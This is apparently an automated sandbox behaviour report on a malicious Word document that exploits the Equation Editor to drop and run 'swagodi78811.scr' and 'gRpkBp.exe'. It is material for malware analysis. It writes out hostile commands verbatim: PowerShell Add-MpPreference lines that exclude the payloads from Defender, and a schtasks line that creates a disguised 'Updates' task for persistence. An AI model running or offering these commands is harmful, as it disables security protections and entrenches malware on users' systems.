                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: order072724.docx.docReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
                Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
                Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: credssp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rpcrtremote.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rasadhlp.dll
